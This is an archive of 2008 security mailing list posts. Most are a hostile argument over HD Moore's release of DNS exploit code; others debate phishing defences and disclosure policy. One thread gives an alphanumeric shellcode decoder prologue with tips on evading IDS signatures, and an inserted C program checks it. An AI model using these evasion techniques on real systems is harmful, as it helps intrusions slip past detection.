References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com>

On Mon, Aug 4, 2008 at 4:44 AM,  wrote:
> On Sun, 03 Aug 2008 22:36:09 BST, n3td3v said:
>
>> He has no excuse for what happened, he is a global international
>> hacker leading the release of the exploit code, its his entire
>> responsibility to make sure his company is secure, even if the servers
>> that were vulnerable were owned by AT&T.
>
> And how, *exactly*, is he supposed to fix servers that aren't under his
> administrative control?
>
> Tell you what - the next time that the company that you get Internet access
> from has an issue, why don't you go ahead and fix it for them, and let us
> know how that all works out, 'kay?
>

In security you're meant to think out of the box and think about ALL eventualities BEFORE something happens..

Why did he phone up and get the AT&T servers patched AFTER the incident and not BEFORE he released the exploit code to the world? Because he is a lamer who didn't think out of the box and didn't think about all eventualities BEFOREHAND, therefore HD Moore on this occasion was a fucking lamer.

It's funny how he managed to get the AT&T servers fixed NOT under his administrative control pretty damn quick AFTER the incident.
Which makes us the security community believe he could have foreseen the obvious and got the AT&T servers fixed BEFORE the incident happened just as quick as AFTER it if he was as good at security as he makes out to be.

Or are you gonna come out with the usual bullshit like, if HD Moore had phoned up BEFORE the incident, they wouldn't have listened to him or patched anything, so in fact the release of the exploit code is justified and the hack is justified because it leaned on AT&T to patch their infrastructure.

The above paragraph is a flawed statement that I believe is bullshit, but one that security researchers use every day to loophole the law and release exploit code and/or hack things.

Even IBM are starting to wake up that releasing exploit code to make the world safer is fundamentally flawed bullshit to loophole the law to supply the bad guys with tools and/or code and to make a name for themselves, while NOT making the security situation any more stable out there on your web application and network security in the reality of things.

HD Moore shouldn't have released the exploit code, that's the bottom line of things and whoever hacked his crap web site via AT&T shouldn't have done it, but who can HD Moore blame but himself?

I suppose it's all AT&T's fault that HD Moore's website got hacked, and not his... I've heard it all now.

It's incredible the amount of bullshit you come out with Valdis to support your super hero HD Moore, and the release of exploit code to the wild as making web application and network security safer for everyone in the long term.

I'm just glad a big player like IBM is waking up to the fundamental flaw in the excuse that security researchers give for supplying the bad guys with code, to get a name for themselves and that it doesn't make the world safer in reality.
All the best,

n3td3v

From blah at blakogre.com Tue Aug 5 14:49:54 2008
From: blah at blakogre.com (blah)
Date: Tue, 5 Aug 2008 06:49:54 -0700
Subject: [Full-disclosure] phish war game
In-Reply-To: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net>
References: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net>
Message-ID: <28f529ba0808050649n30938e0fu6ad32b58a5522653@mail.gmail.com>

>
> observations:
>
> 1. The model is over-simplified, in reality it's unlikely that BLUE
> would consistently achieve 80%. However in reality it's also
> unlikely that RED would enjoy a linear relationship between
> obfuscation and success, specifically, the more RED obfuscates the
> less success it has. Both teams might suffer diminishing returns
> from their efforts. (for the purposes of the above model, these
> effects have been allowed to cancel each other out)
>
> 2. The model has a constant 1% reduction in the victim rate, this is
> debatable, however it will never go upwards, eg., there is nothing
> RED can do to push that number back towards 100%. Conversely,
> everything BLUE does pushes that number towards 0%. In addition,
> other anti-phishing technologies will also be pushing the number
> towards 0%. GREEN itself might even push the number down.
>

FLAWS:

1) This also assumes that no new users ever start using the Internet that may become new victims

2) It also assumes that all evolutions in phisher techniques are predictable. Anyone following the industry knows that all sorts of things have been done so that their phishes seem more realistic/plausible. And, after using these new techniques, RED can push the number of victims back up -- in direct contradiction of your statements, which do not reflect what happens.

These 2 facts alone explain why phishing isn't the simple fix you have made it out to be. Your model is flawed, as it is based on flawed assumptions.

not interesting anymore.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/86d6f003/attachment.html

From xploitable at gmail.com Tue Aug 5 16:27:49 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 5 Aug 2008 16:27:49 +0100
Subject: [Full-disclosure] Fwd: Comment on: Microsoft to give partners heads-up on security vulnerabilities
In-Reply-To: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com>
References: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com>
Message-ID: <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com>

---------- Forwarded message ----------
From: n3td3v
Date: Tue, Aug 5, 2008 at 4:24 PM
Subject: Comment on: Microsoft to give partners heads-up on security vulnerabilities
To: n3td3v

by n3td3v August 5, 2008 8:17 AM

Verbal contracts of non-disclosure agreements don't work, you need a new law in place, which I call the responsible disclosure act, http://seclists.org/fulldisclosure/2008/Jul/0439.html to enforce the agreement by a law if the agreement is broken.

Or are you guys just gonna do another "oops the cat's out the bag" again like what happened with the verbal contract agreement Dan Kaminsky had with everyone before a blog entry leaked the vulnerability by *accident*.

Is this Microsoft agreement of non-disclosure actually enforceable by any current law? If not a new law is needed to be drawn up, see the link above, or this "Microsoft Active Protection Program" is gonna turn out a complete shambles.

http://news.cnet.com/8601-1009_3-10006325.html?communityId=2114&targetCommunityId=2114&messageId=772539#772539

From Avraham.Schneider at aladdin.com Tue Aug 5 17:00:16 2008
From: Avraham.Schneider at aladdin.com (Avraham Moshe Schneider)
Date: Tue, 5 Aug 2008 19:00:16 +0300
Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection
Message-ID: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org>

I fixed a couple of bugs -

1.
The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on
2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640"

This translates to:

_asm
{
    push esp;
    pop eax;
    xor al, 0x36;
    xor al, 0x30;
}

The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa.

You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly.
The diff between the two XOR values should be the length of the resulting string.

I used the EAX register, as XOR'ing it with an immediate value is alphanumeric.

Regards,
Avri

**********************************************************************************************

The contents of this email and any attachments are confidential.
It is intended for the named recipient(s) only.
If you have received this email in error please notify the system manager or the
sender immediately and do not disclose the contents to anyone or make copies.

** eSafe scanned this email for viruses, vandals and malicious content **

**********************************************************************************************

-------------- next part --------------
A non-text attachment was scrubbed...
Name: alnum_decoder_encoder.c
Type: application/octet-stream
Size: 105690 bytes
Desc: alnum_decoder_encoder.c
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/fde6f12f/attachment.obj

From Valdis.Kletnieks at vt.edu Tue Aug 5 18:08:30 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 05 Aug 2008 13:08:30 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: Your message of "Tue, 05 Aug 2008 13:58:55 BST."
             <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com>
Message-ID: <16480.1217956110@turing-police.cc.vt.edu>

On Tue, 05 Aug 2008 13:58:55 BST, n3td3v said:
> Why did he phone up and get the AT&T servers patched AFTER the
> incident and not BEFORE he released the exploit code to the world?
> Because he is a lamer who didn't think out of the box and didn't think
> about all eventualities BEFORE hand, therefore HD Moore on this
> occasion was a fucking lamer.

Or - maybe he's more clued than you think, and he did an actual risk analysis.
Remember - security is *tradeoffs*.

He figures out what the costs would be to move his nameservice to some other site (remembering to include in *all* the incidental costs, such as paying the registrar fee, the dollars/hour it costs for the person on his payroll doing the paperwork, the opportunity cost of what he could *otherwise* have been doing if he wasn't busy moving the DNS around). He figures out what the costs are if the ATT servers do get poisoned (not *that* much, because he's not doing a hell of a lot of e-commerce), and how long it will take him to get ATT to fix it if it breaks.

Then he adds in the *FREE* publicity of getting quoted in all the trade journals (and remember, there's very little publicity that's bad publicity). Consider if he *had* spent his time moving his DNS instead of writing Metasploit rules - *nothing* would have happened, he'd have gotten *zero* mentions. Instead, he gets *two* mentions - one for releasing the Metasploit stuff, and a second for getting caught when ATT gets pwned.

Add it all up, and he's probably *ahead* if he *doesn't* move his DNS SOA to elsewhere.
> The above paragraph is a flawed statement that I believe is bullshit,

Unfortunately for all clued whitehats out there, it's not bullshit. Unless you have something so blatantly obvious that they can get their tiny little brains wrapped around it, they're not going to listen.

You say: "Insufficient bounds checking on the frobniz value allows an off-by-one exploit that may lead to unauthorized code execution"

Clued professional: "Wow, that would suck."

Unclued professional: "Yeah, whatever"

"This is a wake-up call. If this was an actual emergency, this pop-up would be busy emptying your bank account."

that *might* get their attention. Maybe.

> but one that security researchers use every day to loop hole and law
> and release exploit code and/or hack things.

It's amazing how you've managed to make it to "jaded" without first figuring out how this industry actually works...

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/345cb07c/attachment.bin

From xploitable at gmail.com Tue Aug 5 18:40:32 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 5 Aug 2008 18:40:32 +0100
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <16480.1217956110@turing-police.cc.vt.edu>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com>

On Tue, Aug 5, 2008 at 6:08 PM,  wrote:
> On Tue, 05 Aug 2008 13:58:55 BST, n3td3v said:
>> Why did he phone up and get the AT&T servers patched AFTER the
>> incident and not BEFORE he released the exploit code to the world?
>> Because he is a lamer who didn't think out of the box and didn't think
>> about all eventualities BEFORE hand, therefore HD Moore on this
>> occasion was a fucking lamer.
>
> Or - maybe he's more clued than you think, and he did an actual risk analysis.
> Remember - security is *tradeoffs*.
>
> He figures out what the costs would be to move his nameservice to some other
> site (remembering to include in *all* the incidental costs, such as paying the
> registrar fee, the dollars/hour it costs for the person on his payroll doing
> the paperwork, the opportunity cost of what he could *otherwise* have been
> doing if he wasn't busy moving the DNS around). He figures out what the costs
> are if the ATT servers do get poisoned (not *that* much, because he's not doing
> a hell of a lot of e-commerce), and how long it will take him to get ATT to fix
> it if it breaks.
>
> Then he adds in the *FREE* publicity of getting quoted in all the trade
> journals (and remember, there's very little publicity that's bad publicity).
> Consider if he *had* spent his time moving his DNS instead of writing
> Metasploit rules - *nothing* would have happened, he'd have gotten *zero*
> mentions. Instead, he gets *two* mentions - one for releasing the Metasploit
> stuff, and a second for getting caught when ATT gets pwned.
>
> Add it all up, and he's probably *ahead* if he *doesn't* move his DNS SOA to
> elsewhere.
>

Are you suggesting HD Moore had prior knowledge that the Austin Texas AT&T servers were vulnerable? Knowingly knew AT&T was vulnerable but purposely left it exposed to attack, so that he could get publicity for the tags "HD Moore", "Metasploit" and "Breaking Point" if the AT&T servers ever did get attacked?

This sounds like something the intelligence services do, they know an attack is possible but let it happen for political gains.

What is it you're accusing HD Moore of Valdis, allowing an attack to happen like the intelligence services do all the time?
This is a big allegation you've put forward Valdis, that AT&T and the authorities should look into..

>
> It's amazing how you've managed to make it to "jaded" without first figuring
> out how this industry actually works...
>

Yeah, I'm beginning to see how this industry works, false flag attacks, allowing attacks to happen for political gains, the corruption and the criminality.

All the best,

n3td3v

From Valdis.Kletnieks at vt.edu Tue Aug 5 19:57:25 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 05 Aug 2008 14:57:25 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: Your message of "Tue, 05 Aug 2008 18:40:32 BST." <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com>
Message-ID: <21881.1217962645@turing-police.cc.vt.edu>

On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said:
> Are you suggesting HD Moore had prior knowledge that the Austin Texas
> AT&T servers were vulnerable?

No - simply saying that either they were vulnerable, or they weren't. If they weren't vulnerable, HD didn't have to do anything. And even if they *were*, somebody would still have to actually *attack* them.

And even if they *got* attacked, it's quite possible that the upsides of not bothering to do something outweighed the risks. If you estimate that the cost (including "things you could have spent your time doing") is more than the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But in the time I'd waste dealing with the issue, I could generate something that will get us $2,000 in revenue.
So if I fix it, I lose $1500, and if I ignore it, I come out $1,500 ahead if we get hit, and $2,000 if we don't".

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/189cae05/attachment.bin

From xploitable at gmail.com Tue Aug 5 20:36:12 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 5 Aug 2008 20:36:12 +0100
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com>

On Tue, Aug 5, 2008 at 7:57 PM,  wrote:
> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said:
>
>> Are you suggesting HD Moore had prior knowledge that the Austin Texas
>> AT&T servers were vulnerable?
>
> No - simply saying that either they were vulnerable, or they weren't. If
> they weren't vulnerable, HD didn't have to do anything. And even if they
> *were*, somebody would still have to actually *attack* them.
>
> And even if they *got* attacked, it's quite possible that the upsides of not
> bothering to do something outweighed the risks. If you estimate that the
> cost (including "things you could have spent your time doing") is more than
> the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But
> in the time I'd waste dealing with the issue, I could generate something that
> will get us $2,000 in revenue.
> So if I fix it, I lose $1500, and if I ignore
> it, I come out $1,500 ahead if we get hit, and $2,000 if we don't".
>

Is what you're describing not against the law Valdis, it sure sounds like it to me. Some kind of gross negligence...

http://legal-dictionary.thefreedictionary.com/Gross+negligence
http://legal-dictionary.thefreedictionary.com/negligence

Is this what goes on at Virginia Tech on a regular basis? Maybe the authorities should be looking into you a lot more while they are looking into HD Moore. ;)

I wonder if the intelligence services thought like you before 9/11 and 7/7 eh... I get the feeling they did.

For sure people like you who support this kind of activity should be investigated. It sounds criminal.

Have you ever carried out this kind of activity Valdis where you put security and people at risk to make and/or save money?

If cyber-terrorism is going to become a real threat, we don't need people like Valdis around and we should sure keep track of him.

Would you allow a cyber-9-11 to happen Valdis if there was money involved?

I'm starting to become worried about you dude, maybe I should be e-mailing the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I and see what they think about what you've just told me.

You seem to be normalizing what you've just described to me as normal run-of-the-mill legal activity, when it clearly isn't.

To me what you've just described is illegal, criminal and wrong.

All the best,

n3td3v

From avri.schneider at gmail.com Tue Aug 5 21:31:52 2008
From: avri.schneider at gmail.com (Avraham Schneider)
Date: Tue, 5 Aug 2008 23:31:52 +0300
Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection
In-Reply-To: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org>
References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org>
Message-ID:

Oops - that is not correct - it will only work when the second and third bits of ESP are 0 :-)

I was too quick on the send button.
EAX is basically XOR'd with the length of the string, and instead I need to increment it by the length of the string...

I'll have to come up with a better solution... (I'll probably have to resort to patching... but I was looking for a quick and dirty fix)

If anyone comes up with a solution for this before me, I'll buy them a Shawarma next time they're in Israel ;-)

Regards,
Avri

On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider wrote:
> I fixed a couple of bugs -
>
> 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on
> 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640"
> This translates to:
> _asm
> {
>     push esp;
>     pop eax;
>     xor al, 0x36;
>     xor al, 0x30;
> }
>
> The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa.
>
> You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly.
> The diff between the two XOR values should be the length of the resulting string.
>
> I used the EAX register, as XOR'ing it with an immediate value is alphanumeric.
>
> Regards,
> Avri
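The "TX4640" prologue from the two messages above, checked mechanically. This is an added example written for this page, not Avri's alnum_decoder_encoder.c or any code from the original posts; the only facts it relies on are the IA-32 encodings 0x54 = push esp, 0x58 = pop eax and 0x34 ib = xor al, imm8, and the stack address it sweeps (high bytes 0x0012FF00) is a constructed sample. It confirms that the six bytes are all alphanumeric and decode to the four instructions shown, that the two xor al instructions collapse into a single XOR with '6' ^ '0' = 0x06 (the prologue's own length), and then emulates the prologue for every low byte of ESP to show that the XOR reproduces an ADD only when none of the mask's bits is already set in ESP, which for 0x06 is exactly the "second and third bits of ESP are 0" condition in the follow-up: 64 of the 256 low-byte values, not all of them.

```c
/*
 * Added example: verifies the "TX4640" decoder prologue quoted in the post.
 * Editor's code, not Avri's alnum_decoder_encoder.c. Opcode encodings are
 * from the IA-32 instruction set reference:
 *   0x54      push esp
 *   0x58      pop  eax
 *   0x34 ib   xor  al, imm8
 */
#include <stdint.h>
#include <stdio.h>

/* The fixed prologue from the post, as the bytes an IDS would see. */
static const uint8_t PROLOGUE[] = { 'T', 'X', '4', '6', '4', '0' };
#define PROLOGUE_LEN ((int)sizeof PROLOGUE)

/* 1 if every byte is [0-9A-Za-z], i.e. survives an alphanumeric-only filter. */
int is_alphanumeric(const uint8_t *buf, int len)
{
    for (int i = 0; i < len; i++) {
        uint8_t c = buf[i];
        if (!((c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
              (c >= 'a' && c <= 'z')))
            return 0;
    }
    return 1;
}

/* Checks that the bytes are "push esp; pop eax; xor al,i1; xor al,i2" and
 * returns the net mask the XOR pair applies to AL (i1 ^ i2), or -1 if the
 * bytes are something else. */
int prologue_xor_mask(const uint8_t *buf, int len)
{
    if (len != 6 || buf[0] != 0x54 || buf[1] != 0x58 ||
        buf[2] != 0x34 || buf[4] != 0x34)
        return -1;
    return buf[3] ^ buf[5];     /* two "xor al, imm8" collapse into one XOR */
}

/* Emulates the prologue for one ESP value: EAX receives ESP, then only its
 * low byte is XOR'd with mask. Returns 1 if EAX now equals ESP + mask, i.e.
 * the XORs did the job of an ADD (the decoder needs EAX to point past the
 * prologue). A carry out of AL can never be produced by XOR, so the full
 * 32-bit register is compared, not just the low byte. */
int xor_acts_like_add(uint32_t esp, uint8_t mask)
{
    uint32_t eax = esp;                               /* push esp; pop eax   */
    eax = (eax & ~0xFFu) | ((eax ^ mask) & 0xFFu);    /* xor al, '6'; xor al, '0' */
    return eax == esp + mask;
}

/* The general condition: XOR equals ADD exactly when no bit of the mask is
 * already set, so no carry is needed. For mask 0x06 (bits 1 and 2) this is
 * Avri's "second and third bits of ESP are 0". */
int add_has_no_carry(uint32_t esp, uint8_t mask)
{
    return (esp & mask) == 0;
}

/* Sweeps the low byte of a constructed stack address (high bytes 0x0012FF00,
 * which do not influence the result) and counts the values the XOR trick
 * handles correctly. */
int count_working_esp_values(uint8_t mask)
{
    int n = 0;
    for (uint32_t low = 0; low < 256; low++)
        n += xor_acts_like_add(0x0012FF00u | low, mask);
    return n;
}

/* 1 if, for every low byte, "the XOR works" and "no carry needed" agree. */
int xor_rule_matches_carry_rule(uint8_t mask)
{
    for (uint32_t low = 0; low < 256; low++) {
        uint32_t esp = 0x0012FF00u | low;
        if (xor_acts_like_add(esp, mask) != add_has_no_carry(esp, mask))
            return 0;
    }
    return 1;
}

int main(void)
{
    int mask = prologue_xor_mask(PROLOGUE, PROLOGUE_LEN);
    printf("alphanumeric=%d net xor mask=0x%02x working ESP low bytes=%d/256 "
           "carry rule holds=%d\n",
           is_alphanumeric(PROLOGUE, PROLOGUE_LEN), mask,
           count_working_esp_values((uint8_t)mask),
           xor_rule_matches_carry_rule((uint8_t)mask));
    return 0;
}
```

The carry rule is what makes the quick fix unreliable rather than merely unrandomized: the prologue only lands EAX at the right place for a quarter of the possible ESP values, and since ESP is whatever the vulnerable program left it at, the decoder would fail on the other three quarters. That is the same observation as the follow-up's "I need to increment it by the length of the string" rather than XOR it.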
From Valdis.Kletnieks at vt.edu Tue Aug 5 21:57:53 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 05 Aug 2008 16:57:53 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: Your message of "Tue, 05 Aug 2008 20:36:12 BST." <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com>
Message-ID: <27503.1217969873@turing-police.cc.vt.edu>

On Tue, 05 Aug 2008 20:36:12 BST, n3td3v said:
> Is what you're describing not against the law Valdis, it sure sounds
> like it to me. Some kind of gross negligence...

Note that it's "gross negligence" only if there is a *high* risk of *actual* damages that a reasonable person should have foreseen. Also, in the vast majority of cases, the concept only applies to events you actually have control over - so in this instance, HD Moore could *conceivably* be negligent towards *his* company, but if *other* customers of ATT suffer because ATT doesn't fix their stuff, that's ATT's problem, not HD's.
However much you may *want* it to be HD's fault for not contacting ATT and warning them, the law usually doesn't work that way - nor do you *want* it to. If HD was required to warn ATT, then the readers of FD would *also* be required to contact the police in your area and warn them that there was a clueless and mentally unstable person wandering around with significant chance of serious injury to themselves...

For bonus points - identify the actual *LOSS* to HD Moore from the DNS getting hacked. Looks to *me* like he came out *ahead* - he got more headlines talking about it than you can ever hope to get.

> I wonder if the the intelligence services thought like you before 9/11
> and 7/7 eh...I get the feeling they did.

Yes, and since then, we've *failed* to do proper risk analysis. We've spent some five hundred billion dollars and gotten some 6,000 soldiers killed to prevent another attack that kills 3,000 and does 10 billion dollars in damage. So far, we're about 3,000 people and $490,000,000,000 in the hole.

And here's news for you: Many government agencies *still* do calculations that way. They calculate a "value of a life", and use it to evaluate things like environmental and safety regulations: If a life is worth $5M, and the regulation is projected to save 500 lives (via lower risk of cancer, fewer car crashes, whatever), the regulation has to cost less than $2.5B to implement to be worth it. If it costs $2B, but only saves 50 lives, that's $40M per life and not worth it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/a3dd6a5b/attachment.bin

From research at sec-consult.com Tue Aug 5 23:28:12 2008
From: research at sec-consult.com (Bernhard Mueller)
Date: Wed, 6 Aug 2008 00:28:12 +0200
Subject: [Full-disclosure] Interesting things at sec-consult.com, DNS-whitepaper available tomorrow
Message-ID: <1217975292.8503.20.camel@b4byl0n>

Hello,

We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at the SEC Consult website. The presentations (some of which are in German) will include everything from general howtos to highly specialized pentesting stuff.

We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :)

The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at:

http://www.sec-consult.com/publikationen_e.html

Here are some links to what is already online:

* A German guide to WEP/WPA cracking, by Johannes Greil:
  http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf

* A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications):
  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf

* A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl:
  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf

I hope that some of you will find this useful.
Regards,

Bernhard
(Certified Internet Security Superstar)

--
_________________________________________
Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.mueller at sec-consult.com

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.

From research at sec-consult.com Tue Aug 5 23:22:59 2008
From: research at sec-consult.com (Bernhard Mueller)
Date: Tue, 5 Aug 2008 22:22:59 +0000
Subject: [Full-disclosure] (no subject)
Message-ID: <1217974979.8503.16.camel@b4byl0n>

Hello,

We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at the SEC Consult website. The presentations (some of which are in German) will include everything from general howtos to highly specialized pentesting stuff.

We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow.
We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :)

The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at:

http://www.sec-consult.com/publikationen_e.html

Here are some links to what is already online:

* A German guide to WEP/WPA cracking, by Johannes Greil:
  http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf

* A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications):
  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf

* A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl:
  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf

I hope that some of you will find this useful.

Regards,

Bernhard
(Certified Internet Security Superstar)

--
_________________________________________
Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.mueller at sec-consult.com

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.
From redhowlingwolves at nc.rr.com Tue Aug 5 21:41:27 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Tue, 05 Aug 2008 16:41:27 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu>
Message-ID: <4898BAF7.5050100@nc.rr.com>

Valdis.Kletnieks at vt.edu wrote:
> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said:
>
> > Are you suggesting HD Moore had prior knowledge that the Austin Texas
> > AT&T servers were vulnerable?
>
> No - simply saying that either they were vulnerable, or they weren't. If
> they weren't vulnerable, HD didn't have to do anything. And even if they
> *were*, somebody would still have to actually *attack* them.
>
> And even if they *got* attacked, it's quite possible that the upsides of not
> bothering to do something outweighed the risks. If you estimate that the
> cost (including "things you could have spent your time doing") is more than
> the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But
> in the time I'd waste dealing with the issue, I could generate something that
> will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore
> it, I come out $1,500 ahead if we get hit, and $2,000 if we don't".
>

You can't expect n3td3v to understand things like that.
